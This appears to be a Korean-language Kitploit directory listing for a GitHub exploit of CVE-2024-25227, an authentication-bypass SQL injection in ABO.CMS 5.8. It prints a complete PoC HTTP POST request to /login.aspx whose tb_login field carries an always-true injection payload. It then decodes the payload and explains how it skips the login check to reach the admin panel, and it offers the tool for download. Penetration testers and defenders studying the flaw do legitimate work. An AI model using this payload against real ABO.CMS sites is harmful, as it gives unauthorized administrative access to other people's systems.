Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227 — ABO.CMS 5.8용 SQL 인젝션 익스플로잇으로, tb_login 매개변수를 통해 인증을 우회하여 인증되지 않은 관리자 패널 접근을 허용합니다. PoC HTTP 요청과 페이로드가 포함되어 있습니다. | Kitploit
도구/GitHubGitHub/thetrueartist/abo.cms-exploit-unauthenticated-login-bypass-cve-2024-25227
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubthetrueartist/abo.cms-exploit-unauthenticated-login-bypass-cve-2024-25227

ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227

ABO.CMS 5.8용 SQL 인젝션 익스플로잇으로, tb_login 매개변수를 통해 인증을 우회하여 인증되지 않은 관리자 패널 접근을 허용합니다. PoC HTTP 요청과 페이로드가 포함되어 있습니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
2년 전아직 검토되지 않음

ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227

CVE-2024-25227 익스플로잇

CVE-2024-25227은 ABO.CMS 5.8에서 "tb_login" 파라미터에서 발견된 SQLi 취약점입니다.

PoC:

root@kitploit:~
POST /login.aspx HTTP/1.1

Host: localhost

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36

Connection: close

Cache-Control: max-age=0

Cookie: ASP.NET_SessionId=asd123hstjj

Origin: http://localhost

Upgrade-Insecure-Requests: 1

Referer: http://ip

Content-Type: application/x-www-form-urlencoded

Content-Length: 100

VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+

세부 정보

페이로드는 tb_login=27872164'%20or%202579%3d2579--%20이며, URL 인코딩을 제거하면 다음과 같습니다: 27872164' or 2579=2579--

페이로드가 포함된 수정된 요청을 통해 백엔드에 지시하는 것은 다음과 같습니다: 플레이스홀더 "27872164'" 는 항상 참으로 평가되는 조건 ("2579=2579") 과 결합되고, 쿼리의 나머지 부분을 주석 처리하기 위해 "--" 를 사용하여 수정된 쿼리가 주입되도록 합니다.

이를 통해 "tb_login" 필드와 관련된 모든 인증 검사를 효과적으로 우회하여 인증되지 않은 관리자 권한으로 제어판에 접근할 수 있습니다.

도구 다운로드